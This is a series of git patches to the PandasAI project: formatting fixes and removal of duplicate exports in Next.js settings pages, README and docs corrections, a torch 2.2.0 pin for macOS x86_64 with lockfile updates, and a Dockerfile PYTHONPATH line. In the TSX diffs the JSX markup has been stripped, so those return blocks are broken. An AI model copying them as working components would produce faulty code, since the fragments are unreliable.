From e19da71e841bafb14201485ed2d376c7d33905c6 Mon Sep 17 00:00:00 2001
From: AlessandroMarc <52158784+AlessandroMarc@users.noreply.github.com>
Date: Fri, 18 Oct 2024 20:06:35 +0200
Subject: [PATCH 01/58] fix: fixed duplicate export dynamics (#1399)
---
client/app/(ee)/settings/logs/page.tsx | 18 ++---
client/app/settings/datasets/[id]/page.tsx | 44 +++++-----
client/app/settings/datasets/page.tsx | 80 ++++++++-----------
client/app/settings/page.tsx | 6 +-
.../settings/workspaces/addspaces/page.tsx | 42 +++++-----
.../settings/workspaces/editspaces/page.tsx | 38 ++++-----
client/app/settings/workspaces/page.tsx | 70 +++++++---------
7 files changed, 132 insertions(+), 166 deletions(-)
diff --git a/client/app/(ee)/settings/logs/page.tsx b/client/app/(ee)/settings/logs/page.tsx
index 90f266620..786b47fcd 100644
--- a/client/app/(ee)/settings/logs/page.tsx
+++ b/client/app/(ee)/settings/logs/page.tsx
@@ -2,17 +2,15 @@ import React from "react";
import { GetLogs } from "@/services/logs";
import LogsCard from "./logs-card";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default async function Logs() {
- const data = await GetLogs();
+ const data = await GetLogs();
- return (
-
-
Logs
-
-
- );
+ return (
+
+
Logs
+
+
+ );
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/datasets/[id]/page.tsx b/client/app/settings/datasets/[id]/page.tsx
index 84600f608..6380e1239 100644
--- a/client/app/settings/datasets/[id]/page.tsx
+++ b/client/app/settings/datasets/[id]/page.tsx
@@ -3,34 +3,32 @@ import Link from "next/link";
import DatasetCard from "./DatasetCard";
import { GetDatasetDetails } from "@/services/datasets";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
interface PageProps {
- params: {
- id: string;
- };
+ params: {
+ id: string;
+ };
}
export default async function DatasetDetailsPage({ params }: PageProps) {
- const data = await GetDatasetDetails(params.id);
- const dataframe = data?.dataset;
+ const data = await GetDatasetDetails(params.id);
+ const dataframe = data?.dataset;
- return (
- <>
-
-
- Datasets
- {` › ${dataframe?.name || ""}`}
-
+ return (
+ <>
+
+
+ Datasets
+ {` › ${dataframe?.name || ""}`}
+
-
-
- >
- );
+
+
+ >
+ );
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/datasets/page.tsx b/client/app/settings/datasets/page.tsx
index 1481e6903..2a70fc162 100644
--- a/client/app/settings/datasets/page.tsx
+++ b/client/app/settings/datasets/page.tsx
@@ -7,53 +7,43 @@ import { Button } from "@/components/ui/button";
import { GetAllDataSets } from "@/services/datasets";
import AddNewCard from "./AddNewCard";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default async function Datasets() {
- const data = await GetAllDataSets();
+ const data = await GetAllDataSets();
- return (
-
-
Datasets
-
- {data?.datasets?.map((item) => (
-
-
-
-
-
-
-
-
- ))}
+ return (
+
+
Datasets
+
+ {data?.datasets?.map(item => (
+
+
+
+
+
+
+
+
+ ))}
-
-
-
-
-
- );
+
+
+
+
+
+ );
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/page.tsx b/client/app/settings/page.tsx
index 95880dc1a..0dfa41602 100644
--- a/client/app/settings/page.tsx
+++ b/client/app/settings/page.tsx
@@ -1,9 +1,7 @@
import { redirect } from "next/navigation";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default function Home() {
- redirect("/settings/datasets");
+ redirect("/settings/datasets");
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/workspaces/addspaces/page.tsx b/client/app/settings/workspaces/addspaces/page.tsx
index 3f1fadc8f..75c301210 100644
--- a/client/app/settings/workspaces/addspaces/page.tsx
+++ b/client/app/settings/workspaces/addspaces/page.tsx
@@ -4,32 +4,28 @@ import { GetAllDataSets } from "@/services/datasets";
import AddSpaceCard from "./AddSpaceCard";
import { Button } from "@/components/ui/button";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default async function AddSpaces() {
- const data = await GetAllDataSets();
+ const data = await GetAllDataSets();
- return (
-
-
- Workspaces
- › New
-
+ return (
+
+
+ Workspaces
+ › New
+
- {data?.datasets?.length === 0 ? (
-
-
- No datasets available, please add one
-
+ {data?.datasets?.length === 0 ? (
+
+
No datasets available, please add one
-
-
-
- ) : (
-
- )}
-
- );
+
+
+
+ ) : (
+
+ )}
+
+ );
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/workspaces/editspaces/page.tsx b/client/app/settings/workspaces/editspaces/page.tsx
index aa84ccc55..1c254d1b5 100644
--- a/client/app/settings/workspaces/editspaces/page.tsx
+++ b/client/app/settings/workspaces/editspaces/page.tsx
@@ -4,28 +4,24 @@ import { GetAllDataSets } from "@/services/datasets";
import EditSpaceCard from "./EditSpaceCard";
import { GetWorkspaceDetails } from "@/services/spaces";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default async function EditWorkSpaces({ searchParams }) {
- const data = await GetAllDataSets();
- const workspaceDetails = await GetWorkspaceDetails(searchParams.id);
+ const data = await GetAllDataSets();
+ const workspaceDetails = await GetWorkspaceDetails(searchParams.id);
- return (
-
-
- Workspaces
-
-
-
- {workspaceDetails?.name && ` › ${workspaceDetails?.name}`}
-
- {" "}
- › Edit
-
-
-
-
- );
+ return (
+
+
+ Workspaces
+
+
+ {workspaceDetails?.name && ` › ${workspaceDetails?.name}`}
+ {" "}
+ › Edit
+
+
+
+
+ );
}
-export const dynamic='force-dynamic';
-
diff --git a/client/app/settings/workspaces/page.tsx b/client/app/settings/workspaces/page.tsx
index 5de7a53ce..d66fdf609 100644
--- a/client/app/settings/workspaces/page.tsx
+++ b/client/app/settings/workspaces/page.tsx
@@ -6,49 +6,39 @@ import AppTooltip from "@/components/AppTooltip";
import { Button } from "@/components/ui/button";
import { GetAllWorkspaces } from "@/services/spaces";
-export const dynamic = 'force-dynamic';
+export const dynamic = "force-dynamic";
export default async function WorkSpaces() {
- const data = await GetAllWorkspaces();
+ const data = await GetAllWorkspaces();
- return (
-
-
Workspaces
+ return (
+
+
Workspaces
-
- {data?.map((item, index) => (
-
-
-
+
+ {data?.map((item, index) => (
+
+
-
- ))}
-
-
-
-
-
- );
+
+
+
+
+
+
+
+ ))}
+
+
+
+
+
+ );
}
-export const dynamic='force-dynamic';
-
From 48664d73551e0dfee34ec843d92dac6df1504ccf Mon Sep 17 00:00:00 2001
From: Smoothengineer <160827599+Smoothengineer@users.noreply.github.com>
Date: Sun, 20 Oct 2024 21:37:49 +0530
Subject: [PATCH 02/58] chore: minor updates in the README (#1400)
---
README.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 921f9f2da..da7eeeee6 100644
--- a/README.md
+++ b/README.md
@@ -8,11 +8,11 @@
[![Downloads](https://static.pepy.tech/badge/pandasai)](https://pepy.tech/project/pandasai) [![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Open in Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/1ZnO-njhL7TBOYPZaqvMvGtsjckZKrv2E?usp=sharing)
-PandasAI is a Python platform that makes it easy to ask questions to your data in natural language. It helps non-technical users to interact with their data in a more natural way, and it helps technical users to save time and effort when working with data.
+PandasAI is a Python platform that makes it easy to ask questions to your data in natural language. It helps non-technical users to interact with their data in a more natural way, and it helps technical users to save time, and effort when working with data.
# 🚀 Deploying PandasAI
-PandasAI can be used in a variety of ways. You can easily use it in your Jupyter notebooks or streamlit apps, or you can deploy it as a REST API such as with FastAPI or Flask.
+PandasAI can be used in a variety of ways. You can easily use it in your Jupyter notebooks or Streamlit apps, or you can deploy it as a REST API such as with FastAPI or Flask.
If you are interested in the managed PandasAI Cloud or our self-hosted Enterprise Offering, [contact us](https://forms.gle/JEUqkwuTqFZjhP7h8).
@@ -20,7 +20,7 @@ If you are interested in the managed PandasAI Cloud or our self-hosted Enterpris
You can find the full documentation for PandasAI [here](https://pandas-ai.readthedocs.io/en/latest/).
-You can either decide to use PandasAI in your Jupyter notebooks, streamlit apps, or use the client and server architecture from the repo.
+You can either decide to use PandasAI in your Jupyter notebooks, Streamlit apps, or use the client and server architecture from the repo.
## ☁️ Using the platform
From c4478b58d11d7d687acea6fb2c2920731d7fce0f Mon Sep 17 00:00:00 2001
From: Muhammad Adam <118662764+Muhammad-Adam1@users.noreply.github.com>
Date: Tue, 22 Oct 2024 19:14:53 +0500
Subject: [PATCH 03/58] docs: update library.mdx (#1406)
Add 's' in the end of keyword "clarification_question"
agent.clarification_question('What is the GDP of the United States?')
---
docs/library.mdx | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/docs/library.mdx b/docs/library.mdx
index 360030817..a1e01097d 100644
--- a/docs/library.mdx
+++ b/docs/library.mdx
@@ -176,7 +176,7 @@ agent.chat('And which one has the most deals?')
An agent will also be able to ask clarification questions if it does not have enough information to answer the query. For example:
```python
-agent.clarification_question('What is the GDP of the United States?')
+agent.clarification_questions('What is the GDP of the United States?')
```
this will return up to 3 clarification questions that the agent can ask the user to get more information to answer the query.
From 30b2fa7620e26188d5980834d8fc1c411b687523 Mon Sep 17 00:00:00 2001
From: giuseppe-coco <76009241+giuseppe-coco@users.noreply.github.com>
Date: Tue, 29 Oct 2024 18:36:06 +0100
Subject: [PATCH 04/58] fix[#1415]: using torch 2.2.0 in macOS x86_64 (#1417)
* Add /app to PYTHONPATH
* fix for issue #1415
---------
Co-authored-by: Giuseppe Coco
---
poetry.lock | 144 +++++++++++++++++++++++++++++++++++++++-------
pyproject.toml | 4 ++
server/Dockerfile | 2 +
3 files changed, 130 insertions(+), 20 deletions(-)
diff --git a/poetry.lock b/poetry.lock
index cc828313b..ddacd0fd1 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -1,4 +1,4 @@
-# This file is automatically @generated by Poetry 1.8.2 and should not be changed by hand.
+# This file is automatically @generated by Poetry 1.8.3 and should not be changed by hand.
[[package]]
name = "aiohappyeyeballs"
@@ -1627,7 +1627,7 @@ files = [
name = "fsspec"
version = "2024.9.0"
description = "File-system specification"
-optional = true
+optional = false
python-versions = ">=3.8"
files = [
{file = "fsspec-2024.9.0-py3-none-any.whl", hash = "sha256:a0947d552d8a6efa72cc2c730b12c41d043509156966cca4fb157b0f2a0c574b"},
@@ -4037,7 +4037,7 @@ files = [
name = "mpmath"
version = "1.3.0"
description = "Python library for arbitrary-precision floating-point arithmetic"
-optional = true
+optional = false
python-versions = "*"
files = [
{file = "mpmath-1.3.0-py3-none-any.whl", hash = "sha256:a0b2b9fe80bbcd81a6647ff13108738cfb482d481d826cc0e02f5b35e5c88d2c"},
@@ -4272,7 +4272,7 @@ pyarrow = ["pyarrow (>=11.0.0)"]
name = "networkx"
version = "3.2.1"
description = "Python package for creating and manipulating graphs and networks"
-optional = true
+optional = false
python-versions = ">=3.9"
files = [
{file = "networkx-3.2.1-py3-none-any.whl", hash = "sha256:f18c69adc97877c42332c170849c96cefa91881c99a7cb3e95b7c659ebdc1ec2"},
@@ -4346,7 +4346,7 @@ files = [
name = "nvidia-cublas-cu12"
version = "12.1.3.1"
description = "CUBLAS native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cublas_cu12-12.1.3.1-py3-none-manylinux1_x86_64.whl", hash = "sha256:ee53ccca76a6fc08fb9701aa95b6ceb242cdaab118c3bb152af4e579af792728"},
@@ -4357,7 +4357,7 @@ files = [
name = "nvidia-cuda-cupti-cu12"
version = "12.1.105"
description = "CUDA profiling tools runtime libs."
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cuda_cupti_cu12-12.1.105-py3-none-manylinux1_x86_64.whl", hash = "sha256:e54fde3983165c624cb79254ae9818a456eb6e87a7fd4d56a2352c24ee542d7e"},
@@ -4368,7 +4368,7 @@ files = [
name = "nvidia-cuda-nvrtc-cu12"
version = "12.1.105"
description = "NVRTC native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cuda_nvrtc_cu12-12.1.105-py3-none-manylinux1_x86_64.whl", hash = "sha256:339b385f50c309763ca65456ec75e17bbefcbbf2893f462cb8b90584cd27a1c2"},
@@ -4379,18 +4379,31 @@ files = [
name = "nvidia-cuda-runtime-cu12"
version = "12.1.105"
description = "CUDA Runtime native Libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cuda_runtime_cu12-12.1.105-py3-none-manylinux1_x86_64.whl", hash = "sha256:6e258468ddf5796e25f1dc591a31029fa317d97a0a94ed93468fc86301d61e40"},
{file = "nvidia_cuda_runtime_cu12-12.1.105-py3-none-win_amd64.whl", hash = "sha256:dfb46ef84d73fababab44cf03e3b83f80700d27ca300e537f85f636fac474344"},
]
+[[package]]
+name = "nvidia-cudnn-cu12"
+version = "8.9.2.26"
+description = "cuDNN runtime libraries"
+optional = false
+python-versions = ">=3"
+files = [
+ {file = "nvidia_cudnn_cu12-8.9.2.26-py3-none-manylinux1_x86_64.whl", hash = "sha256:5ccb288774fdfb07a7e7025ffec286971c06d8d7b4fb162525334616d7629ff9"},
+]
+
+[package.dependencies]
+nvidia-cublas-cu12 = "*"
+
[[package]]
name = "nvidia-cudnn-cu12"
version = "9.1.0.70"
description = "cuDNN runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cudnn_cu12-9.1.0.70-py3-none-manylinux2014_x86_64.whl", hash = "sha256:165764f44ef8c61fcdfdfdbe769d687e06374059fbb388b6c89ecb0e28793a6f"},
@@ -4404,7 +4417,7 @@ nvidia-cublas-cu12 = "*"
name = "nvidia-cufft-cu12"
version = "11.0.2.54"
description = "CUFFT native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cufft_cu12-11.0.2.54-py3-none-manylinux1_x86_64.whl", hash = "sha256:794e3948a1aa71fd817c3775866943936774d1c14e7628c74f6f7417224cdf56"},
@@ -4415,7 +4428,7 @@ files = [
name = "nvidia-curand-cu12"
version = "10.3.2.106"
description = "CURAND native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_curand_cu12-10.3.2.106-py3-none-manylinux1_x86_64.whl", hash = "sha256:9d264c5036dde4e64f1de8c50ae753237c12e0b1348738169cd0f8a536c0e1e0"},
@@ -4426,7 +4439,7 @@ files = [
name = "nvidia-cusolver-cu12"
version = "11.4.5.107"
description = "CUDA solver native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cusolver_cu12-11.4.5.107-py3-none-manylinux1_x86_64.whl", hash = "sha256:8a7ec542f0412294b15072fa7dab71d31334014a69f953004ea7a118206fe0dd"},
@@ -4442,7 +4455,7 @@ nvidia-nvjitlink-cu12 = "*"
name = "nvidia-cusparse-cu12"
version = "12.1.0.106"
description = "CUSPARSE native runtime libraries"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_cusparse_cu12-12.1.0.106-py3-none-manylinux1_x86_64.whl", hash = "sha256:f3b50f42cf363f86ab21f720998517a659a48131e8d538dc02f8768237bd884c"},
@@ -4452,11 +4465,21 @@ files = [
[package.dependencies]
nvidia-nvjitlink-cu12 = "*"
+[[package]]
+name = "nvidia-nccl-cu12"
+version = "2.19.3"
+description = "NVIDIA Collective Communication Library (NCCL) Runtime"
+optional = false
+python-versions = ">=3"
+files = [
+ {file = "nvidia_nccl_cu12-2.19.3-py3-none-manylinux1_x86_64.whl", hash = "sha256:a9734707a2c96443331c1e48c717024aa6678a0e2a4cb66b2c364d18cee6b48d"},
+]
+
[[package]]
name = "nvidia-nccl-cu12"
version = "2.20.5"
description = "NVIDIA Collective Communication Library (NCCL) Runtime"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_nccl_cu12-2.20.5-py3-none-manylinux2014_aarch64.whl", hash = "sha256:1fc150d5c3250b170b29410ba682384b14581db722b2531b0d8d33c595f33d01"},
@@ -4467,7 +4490,7 @@ files = [
name = "nvidia-nvjitlink-cu12"
version = "12.6.68"
description = "Nvidia JIT LTO Library"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_nvjitlink_cu12-12.6.68-py3-none-manylinux2014_aarch64.whl", hash = "sha256:b3fd0779845f68b92063ab1393abab1ed0a23412fc520df79a8190d098b5cd6b"},
@@ -4479,7 +4502,7 @@ files = [
name = "nvidia-nvtx-cu12"
version = "12.1.105"
description = "NVIDIA Tools Extension"
-optional = true
+optional = false
python-versions = ">=3"
files = [
{file = "nvidia_nvtx_cu12-12.1.105-py3-none-manylinux1_x86_64.whl", hash = "sha256:dc21cf308ca5691e7c04d962e213f8a4aa9bbfa23d95412f452254c2caeb09e5"},
@@ -7471,7 +7494,7 @@ snowflake = ["snowflake-connector-python (>=2.8.0)", "snowflake-snowpark-python[
name = "sympy"
version = "1.13.3"
description = "Computer algebra system (CAS) in Python"
-optional = true
+optional = false
python-versions = ">=3.8"
files = [
{file = "sympy-1.13.3-py3-none-any.whl", hash = "sha256:54612cf55a62755ee71824ce692986f23c88ffa77207b30c1368eda4a7060f73"},
@@ -7728,11 +7751,69 @@ files = [
{file = "tomlkit-0.13.2.tar.gz", hash = "sha256:fff5fe59a87295b278abd31bec92c15d9bc4a06885ab12bcea52c71119392e79"},
]
+[[package]]
+name = "torch"
+version = "2.2.0"
+description = "Tensors and Dynamic neural networks in Python with strong GPU acceleration"
+optional = false
+python-versions = ">=3.8.0"
+files = [
+ {file = "torch-2.2.0-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:d366158d6503a3447e67f8c0ad1328d54e6c181d88572d688a625fac61b13a97"},
+ {file = "torch-2.2.0-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:707f2f80402981e9f90d0038d7d481678586251e6642a7a6ef67fc93511cb446"},
+ {file = "torch-2.2.0-cp310-cp310-win_amd64.whl", hash = "sha256:15c8f0a105c66b28496092fca1520346082e734095f8eaf47b5786bac24b8a31"},
+ {file = "torch-2.2.0-cp310-none-macosx_10_9_x86_64.whl", hash = "sha256:0ca4df4b728515ad009b79f5107b00bcb2c63dc202d991412b9eb3b6a4f24349"},
+ {file = "torch-2.2.0-cp310-none-macosx_11_0_arm64.whl", hash = "sha256:3d3eea2d5969b9a1c9401429ca79efc668120314d443d3463edc3289d7f003c7"},
+ {file = "torch-2.2.0-cp311-cp311-manylinux1_x86_64.whl", hash = "sha256:0d1c580e379c0d48f0f0a08ea28d8e373295aa254de4f9ad0631f9ed8bc04c24"},
+ {file = "torch-2.2.0-cp311-cp311-manylinux2014_aarch64.whl", hash = "sha256:9328e3c1ce628a281d2707526b4d1080eae7c4afab4f81cea75bde1f9441dc78"},
+ {file = "torch-2.2.0-cp311-cp311-win_amd64.whl", hash = "sha256:03c8e660907ac1b8ee07f6d929c4e15cd95be2fb764368799cca02c725a212b8"},
+ {file = "torch-2.2.0-cp311-none-macosx_10_9_x86_64.whl", hash = "sha256:da0cefe7f84ece3e3b56c11c773b59d1cb2c0fd83ddf6b5f7f1fd1a987b15c3e"},
+ {file = "torch-2.2.0-cp311-none-macosx_11_0_arm64.whl", hash = "sha256:f81d23227034221a4a4ff8ef24cc6cec7901edd98d9e64e32822778ff01be85e"},
+ {file = "torch-2.2.0-cp312-cp312-manylinux1_x86_64.whl", hash = "sha256:dcbfb2192ac41ca93c756ebe9e2af29df0a4c14ee0e7a0dd78f82c67a63d91d4"},
+ {file = "torch-2.2.0-cp312-cp312-manylinux2014_aarch64.whl", hash = "sha256:9eeb42971619e24392c9088b5b6d387d896e267889d41d267b1fec334f5227c5"},
+ {file = "torch-2.2.0-cp312-cp312-win_amd64.whl", hash = "sha256:c718b2ca69a6cac28baa36d86d8c0ec708b102cebd1ceb1b6488e404cd9be1d1"},
+ {file = "torch-2.2.0-cp312-none-macosx_10_9_x86_64.whl", hash = "sha256:f11d18fceb4f9ecb1ac680dde7c463c120ed29056225d75469c19637e9f98d12"},
+ {file = "torch-2.2.0-cp312-none-macosx_11_0_arm64.whl", hash = "sha256:ee1da852bfd4a7e674135a446d6074c2da7194c1b08549e31eae0b3138c6b4d2"},
+ {file = "torch-2.2.0-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:0d819399819d0862268ac531cf12a501c253007df4f9e6709ede8a0148f1a7b8"},
+ {file = "torch-2.2.0-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:08f53ccc38c49d839bc703ea1b20769cc8a429e0c4b20b56921a9f64949bf325"},
+ {file = "torch-2.2.0-cp38-cp38-win_amd64.whl", hash = "sha256:93bffe3779965a71dab25fc29787538c37c5d54298fd2f2369e372b6fb137d41"},
+ {file = "torch-2.2.0-cp38-none-macosx_10_9_x86_64.whl", hash = "sha256:c17ec323da778efe8dad49d8fb534381479ca37af1bfc58efdbb8607a9d263a3"},
+ {file = "torch-2.2.0-cp38-none-macosx_11_0_arm64.whl", hash = "sha256:c02685118008834e878f676f81eab3a952b7936fa31f474ef8a5ff4b5c78b36d"},
+ {file = "torch-2.2.0-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:d9f39d6f53cec240a0e3baa82cb697593340f9d4554cee6d3d6ca07925c2fac0"},
+ {file = "torch-2.2.0-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:51770c065206250dc1222ea7c0eff3f88ab317d3e931cca2aee461b85fbc2472"},
+ {file = "torch-2.2.0-cp39-cp39-win_amd64.whl", hash = "sha256:008e4c6ad703de55af760c73bf937ecdd61a109f9b08f2bbb9c17e7c7017f194"},
+ {file = "torch-2.2.0-cp39-none-macosx_10_9_x86_64.whl", hash = "sha256:de8680472dd14e316f42ceef2a18a301461a9058cd6e99a1f1b20f78f11412f1"},
+ {file = "torch-2.2.0-cp39-none-macosx_11_0_arm64.whl", hash = "sha256:99e1dcecb488e3fd25bcaac56e48cdb3539842904bdc8588b0b255fde03a254c"},
+]
+
+[package.dependencies]
+filelock = "*"
+fsspec = "*"
+jinja2 = "*"
+networkx = "*"
+nvidia-cublas-cu12 = {version = "12.1.3.1", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cuda-cupti-cu12 = {version = "12.1.105", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cuda-nvrtc-cu12 = {version = "12.1.105", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cuda-runtime-cu12 = {version = "12.1.105", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cudnn-cu12 = {version = "8.9.2.26", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cufft-cu12 = {version = "11.0.2.54", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-curand-cu12 = {version = "10.3.2.106", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cusolver-cu12 = {version = "11.4.5.107", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-cusparse-cu12 = {version = "12.1.0.106", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-nccl-cu12 = {version = "2.19.3", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+nvidia-nvtx-cu12 = {version = "12.1.105", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+sympy = "*"
+triton = {version = "2.2.0", markers = "platform_system == \"Linux\" and platform_machine == \"x86_64\""}
+typing-extensions = ">=4.8.0"
+
+[package.extras]
+opt-einsum = ["opt-einsum (>=3.3)"]
+optree = ["optree (>=0.9.1)"]
+
[[package]]
name = "torch"
version = "2.4.1"
description = "Tensors and Dynamic neural networks in Python with strong GPU acceleration"
-optional = true
+optional = false
python-versions = ">=3.8.0"
files = [
{file = "torch-2.4.1-cp310-cp310-manylinux1_x86_64.whl", hash = "sha256:362f82e23a4cd46341daabb76fba08f04cd646df9bfaf5da50af97cb60ca4971"},
@@ -7890,11 +7971,34 @@ torchhub = ["filelock", "huggingface-hub (>=0.23.2,<1.0)", "importlib-metadata",
video = ["av (==9.2.0)", "decord (==0.6.0)"]
vision = ["Pillow (>=10.0.1,<=15.0)"]
+[[package]]
+name = "triton"
+version = "2.2.0"
+description = "A language and compiler for custom Deep Learning operations"
+optional = false
+python-versions = "*"
+files = [
+ {file = "triton-2.2.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a2294514340cfe4e8f4f9e5c66c702744c4a117d25e618bd08469d0bfed1e2e5"},
+ {file = "triton-2.2.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:da58a152bddb62cafa9a857dd2bc1f886dbf9f9c90a2b5da82157cd2b34392b0"},
+ {file = "triton-2.2.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0af58716e721460a61886668b205963dc4d1e4ac20508cc3f623aef0d70283d5"},
+ {file = "triton-2.2.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e8fe46d3ab94a8103e291bd44c741cc294b91d1d81c1a2888254cbf7ff846dab"},
+ {file = "triton-2.2.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b8ce26093e539d727e7cf6f6f0d932b1ab0574dc02567e684377630d86723ace"},
+ {file = "triton-2.2.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:227cc6f357c5efcb357f3867ac2a8e7ecea2298cd4606a8ba1e931d1d5a947df"},
+]
+
+[package.dependencies]
+filelock = "*"
+
+[package.extras]
+build = ["cmake (>=3.20)", "lit"]
+tests = ["autopep8", "flake8", "isort", "numpy", "pytest", "scipy (>=1.7.1)", "torch"]
+tutorials = ["matplotlib", "pandas", "tabulate", "torch"]
+
[[package]]
name = "triton"
version = "3.0.0"
description = "A language and compiler for custom Deep Learning operations"
-optional = true
+optional = false
python-versions = "*"
files = [
{file = "triton-3.0.0-1-cp310-cp310-manylinux2014_x86_64.manylinux_2_17_x86_64.whl", hash = "sha256:e1efef76935b2febc365bfadf74bcb65a6f959a9872e5bddf44cc9e0adce1e1a"},
@@ -8718,4 +8822,4 @@ yfinance = ["yfinance"]
[metadata]
lock-version = "2.0"
python-versions = ">=3.9,<3.9.7 || >3.9.7,<4.0"
-content-hash = "1b765afee999b83c0fc7f1c56c1a26656d91ca3e3455c9488becdd3e853fc31c"
+content-hash = "655ec13eec4de9a66fc4acdf470254ed7b7f25426c88c785df8bd9d1698972db"
diff --git a/pyproject.toml b/pyproject.toml
index d9afad8af..2b2a10714 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -57,6 +57,10 @@ sentence-transformers = {version = "^2.3.0", optional = true}
sqlglot = {extras = ["rs"], version = "^25.0.3"}
pymilvus = {version = "^2.4.6", optional = true}
milvus-model = {version = "^0.2.7", optional = true}
+torch = [
+ { version = "2.2.0", markers = "sys_platform == 'darwin' and platform_machine == 'x86_64'" },
+ { version = "2.4.1", markers = "sys_platform != 'darwin'" }
+]
[tool.poetry.group.dev]
optional = true
diff --git a/server/Dockerfile b/server/Dockerfile
index 2896796e5..be9a5fb88 100644
--- a/server/Dockerfile
+++ b/server/Dockerfile
@@ -21,6 +21,8 @@ RUN curl -sSL https://install.python-poetry.org | python3 -
# Add Poetry to PATH
ENV PATH="/root/.local/bin:$PATH"
+ENV PYTHONPATH=/app
+
# Copy the current directory contents into the container at /app
COPY . /app
From f32bd0d3bcb56e52432ab10fcfe695050c55755a Mon Sep 17 00:00:00 2001
From: giuseppe-coco <76009241+giuseppe-coco@users.noreply.github.com>
Date: Tue, 29 Oct 2024 18:36:31 +0100
Subject: [PATCH 05/58] chore: add /app to PYTHONPATH (#1416)
Co-authored-by: Giuseppe Coco
From 719043c62bf9e0740854d7367f757bdf1d3ee6b3 Mon Sep 17 00:00:00 2001
From: Muhammad Adam <118662764+Muhammad-Adam1@users.noreply.github.com>
Date: Tue, 29 Oct 2024 22:37:55 +0500
Subject: [PATCH 06/58] docs: update llms.mdx (#1410)
Add documentation of how to use pandasai.json file
---
docs/llms.mdx | 24 +++++++++++++++++++++---
1 file changed, 21 insertions(+), 3 deletions(-)
diff --git a/docs/llms.mdx b/docs/llms.mdx
index e3b4720db..98897dda4 100644
--- a/docs/llms.mdx
+++ b/docs/llms.mdx
@@ -7,11 +7,11 @@ The generated code is then executed to produce the result.
[![Choose the LLM](https://cdn.loom.com/sessions/thumbnails/5496c9c07ee04f69bfef1bc2359cd591-00001.jpg)](https://www.loom.com/share/5496c9c07ee04f69bfef1bc2359cd591 "Choose the LLM")
-You can either choose a LLM by instantiating one and passing it to the `SmartDataFrame` or `SmartDatalake` constructor,
-or you can specify one in the `pandasai.json` file.
+You can either choose a LLM by either instantiating it and passing it to the `SmartDataFrame` or `SmartDatalake` constructor,
+or by specifying it in the `pandasai.json` configuration file.
If the model expects one or more parameters, you can pass them to the constructor or specify them in the `pandasai.json`
-file, in the `llm_options` param, as it follows:
+file, in the `llm_options` parameters, Here’s an example of how to structure your `pandasai.json` file:
```json
{
@@ -21,6 +21,24 @@ file, in the `llm_options` param, as it follows:
}
}
```
+> **Note:**
+> `pandasai.json` can be configure for any LLM.
+
+## Working with pandasai.json file
+
+In this example, `data.csv` is your data file, and pandasai.json is the configuration file. Make sure the configuration file is named `pandasai.json` and is in the same folder as your code.
+
+```python
+from pandasai import SmartDataframe
+from pandasai.config import load_config_from_json
+
+# Load configuration from pandasai.json
+config = load_config_from_json()
+
+df = SmartDataframe("data.csv", config=config)
+response = df.chat("give me revenue of Top 5 companies for year 2021")
+print(response)
+```
## BambooLLM
